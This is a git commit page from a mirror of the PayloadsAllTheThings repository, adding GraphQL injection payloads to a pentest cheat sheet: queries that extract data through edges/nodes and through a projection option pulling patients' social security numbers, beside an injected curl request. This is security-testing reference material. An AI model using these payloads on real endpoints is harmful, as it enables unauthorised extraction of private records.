0x22bb
/
PayloadsAllTheThings
mirror of https://github.com/swisskyrepo/PayloadsAllTheThings.git
1
0
Fork 0
Code Releases Activity

GraphQL - Projection + Edges/Nodes

This commit is contained in:
Swissky 2019-07-05 21:34:04 +02:00
parent f6564869f0
commit 6cecb8fa7a
1 changed files with 30 additions and 1 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

31
GraphQL Injection/README.md
View File

@ -10,6 +10,8 @@
* [Identify an injection point](#identify-an-injection-point)
* [Enumerate Database Schema via Instropection](#enumerate-database-schema-via-introspection)
* [Extract data](#extract-data)
* [Extract data using edges/nodes](#extract-data-using-edges-nodes)
* [Extract data using projections](#extract-data-using-projections)
* [Enumerate the types' definition](#enumerate-the-type-definition)
* [Use mutations](#use-mutations)
* [NOSQL injection](#nosql-injection)
@ -159,6 +161,32 @@ example.com/graphql?query={TYPE_1{FIELD_1,FIELD_2}}
![HTB Help - GraphQL injection](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/GraphQL%20Injection/Images/htb-help.png?raw=true)
### Extract data using edges/nodes
```json
{
"query": "query {
teams{
total_count,edges{
node{
id,_id,about,handle,state
}
}
}
}"
}
```
### Extract data using projections
:warning: Dont forget to escape the " inside the **options**.
```json
{doctors(options: "{\"patients.ssn\" :1}"){firstName lastName id patients{ssn}}}
```
### Enumerate the types' definition
Enumerate the definition of interesting types using the following GraphQL query, replacing "User" with the chosen type
@ -214,4 +242,5 @@ curl -X POST http://localhost:8080/graphql\?embedded_submission_form_uuid\=1%27%
* [Looting GraphQL Endpoints for Fun and Profit - @theRaz0r](https://raz0r.name/articles/looting-graphql-endpoints-for-fun-and-profit/)
* [How to set up a GraphQL Server using Node.js, Express & MongoDB - 5 NOVEMBER 2018 - Leonardo Maldonado](https://www.freecodecamp.org/news/how-to-set-up-a-graphql-server-using-node-js-express-mongodb-52421b73f474/)
* [GraphQL cheatsheet - DEVHINTS.IO](https://devhints.io/graphql)
* [HIP19 Writeup - Meet Your Doctor 1,2,3 - June 22, 2019 - Swissky](https://swisskyrepo.github.io/HIP19-MeetYourDoctor/)
* [HIP19 Writeup - Meet Your Doctor 1,2,3 - June 22, 2019 - Swissky](https://swisskyrepo.github.io/HIP19-MeetYourDoctor/)
* [Introspection query leaks sensitive graphql system information - @Zuriel](https://hackerone.com/reports/291531)